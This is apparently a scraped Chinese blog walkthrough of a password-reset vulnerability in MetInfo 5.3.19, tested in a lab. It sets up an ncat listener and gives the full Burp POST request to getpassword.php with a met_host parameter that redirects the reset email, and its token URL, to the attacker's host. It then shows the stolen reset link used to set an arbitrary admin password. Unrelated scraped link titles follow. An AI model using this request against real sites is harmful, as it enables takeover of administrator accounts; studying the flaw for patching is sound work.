metinfo 5.3.19密码重置漏洞
安装完成之后,即便之前已经将各目录设置为777了,到这一步时,也会将confg/config_db.php
设置为只读。
查看改文件,发现确实是刚修改的。
步骤
先在一台metinfo服务器能访问的机器上设置监听80端口,如果metinfo能访问公网则可以设置公网服务器的IP,这里我就只设置为我metinfo所在虚拟机的宿主机的IP了。
C:\Users\caiqiqi>ncat -lvv 80
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
在burp中构造如下请求:
POST /admin/admin/getpassword.php?met_host=192.168.96.1 HTTP/1.1
Host: 192.168.96.129
Content-Length: 93
Cache-Control: max-age=0
Origin: http://192.168.96.129
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3580.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.96.129/admin/admin/getpassword.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: bdshare_firstime=1537607377172; PHPSESSID=88ff446fa200097801dbc105bd91fb27; page_iframe_url=http://192.168.96.129/index.php?lang=cn&pageset=1; re_url=http%3A%2F%2F192.168.96.129%2Fadmin%2F
Connection: closeaction=next2&abt_type=2&admin_mobile=77caikiki%40gmail.com&submit=%E4%B8%8B%E4%B8%80%E6%AD%A5
然后回返回这样。
然后在宿主机上的ncat可以看到传来的流量:
向我指定的met_host
即192.168.96.1
的passwordmail.php
发送了POST请求。
其中有一个a标签,里面是重置密码邮件中用于重置密码的url:
http://192.168.96.129/admin/admi
n/getpassword.php?p=3ddePPh60cYObk8%2Bvjaggw%2BaoSYNrzFyO1%2FD7FeDSJ9S0F3PTxziVm
oLko8TrDQ0k0hD%2F65ytaW78BoqDXx2WbM
访问这个链接得到:
即可重置为任意密码。
使用新的密码成功登陆。
参考
https://blog.csdn.net/sinat_28757329/article/details/78868499
metinfo 5.3.19密码重置漏洞相关推荐
- XSS漏洞利用---PHPMyWind 任意密码重置漏洞
[漏洞详情] 1.PHPMyWind是一套基于PHP和MySQL并符合W3C标准的企业网站建设解决方案,拥有着较大的用户群体(根据PHPMyWind官网介绍,已下载超15万次),受影响的版本是5.3- ...
- 墨者学院-登录密码重置漏洞分析溯源
墨者学院-登录密码重置漏洞分析溯源 此题我是这么做出来的,首先用我已知的手机号进行重置密码操作,然后再开一个网页,填上嫌疑人的手机号,并发送短信,然后也给已知的手机号发送验证码 再给嫌疑人的复制过去, ...
- TP-Link TL-WR840N v6.20(EU) 密码重置漏洞
TP-Link TL-WR840N v6.20(EU) 密码重置漏洞 (CVE-2021-46122) #TPLINK.#CVE.#crash.#rce 最后修改时间:2022.04.18. 故事 寒 ...
- 记一次任意用户密码重置漏洞(session覆盖)
首先,注册用户(两个用户),我用我的小号,大号进行注册,过程方便就先省略 接下来两个号分别登录,登录完退出 (强迫症) 然后就去找密码重置的界面了 第一个是被重置的帐户 然后分别发送邮件 注意!:第一 ...
- CVE-2017-8295——WordPress未经授权密码重置漏洞
漏洞提交者:Dawid Golunski 漏洞编号:CVE-2017-8295 发布日期:2017-05-03 修订版本:1.0 漏洞危害:中/高 I. 漏洞 WordPress内核<= 4.7 ...
- DeDecms任意用户登录,管理员密码重置漏洞
基本信息 漏洞编号:SSV-97087 实验版本:dedecms v5.7SP2 下载地址:http://updatenew.dedecms.com/base-v57/package/DedeCMS- ...
- 墨者登录密码重置漏洞分析溯源题解
给了一个链接,自己的号码是18868345809,题目让重置17101304128的号码,首先我们尝试重置自己的号码看看 能发现是在页面上直接显示的,这给我的第一个想法是直接抓包修改号码然后拿到验证码 ...
- 换一种姿势挖掘任意用户密码重置漏洞
上一篇文章我们提到了利用Unicode规范化来挖洞的思路以及方法,大家反响很热烈 一直在后台给我留言,苦苦哀求 让我憋tm写了,一直写烦不烦呀 现在的读者都已经这么体贴了吗?都已经开始关心我辛苦码字烦 ...
- 逻辑漏洞 - 密码重置
https://bbs.ichunqiu.com/thread-59325-1-1.html 前言 任意用户密码重置漏洞在渗透测试中属于逻辑漏洞的一种,形成的原因是开发者在开发时没有对各项参数进行准确 ...
最新文章
- ^l手动换行符 ^p段落标记符 /n/r_/n
- LauncherApplication
- android art虚拟机安装,Android中art虚拟机启动流程
- json字符串转java对象数组
- visualvm远程监控jvm_大型企业JVM实战:优化及面试热点分析
- 如何用java实现加减_用Java实现不用加减乘除做加法操作
- 通用职责分配软件原则之5-控制器原则
- python如何合并两个字典
- 选择WebSockets还是REST?
- DIOCP开源项目-DIOCP3的重生和稳定版本发布
- Java设计模式(7)——装饰者模式
- 大麦无线虚拟服务器,解答大麦盒子无线设置的问题
- mysql添加开机自启_【实操篇】如何设置MySQL开机自启动
- 将磁盘分区标记为活动分区后取消
- Flask PyMongo的基本使用
- 从知名外企到创业公司做CTO是一种怎样的体验?
- 遵循亚马逊标准!Kindle 电子书专业制作教程
- hive explode(split(split_feild,‘split_char‘)) split_feild为null 整条数据会丢掉
- linux虚拟机a problem has occurred and the system can‘t recover解决方案
- 15天入门Python,每天都该干嘛,规划路线。
热门文章
- python幂次方计算公式_【python】计算一个数得n次方?
- 俄语入门难不难-大舌音难学吗-弹舌难学吗
- 搭建asp会议签到系统 第四章 会议统计
- Linux启动/停止/重启防火墙
- 苹果为App订阅付费添加二次确认 避免意外支付情况
- 方舟生存显示都是外国服务器,方舟生存进化:在新服的国人,都是如何跟外国人交流的?...
- 用树莓派搜寻地外文明
- rOG魔霸新锐2022和魔霸6区别 哪个好
- 那些好用的网站推荐(一)----功能网站
- 自建dnspod解析服务器,自建DNS解析及Glue Record 自建DNS解析域名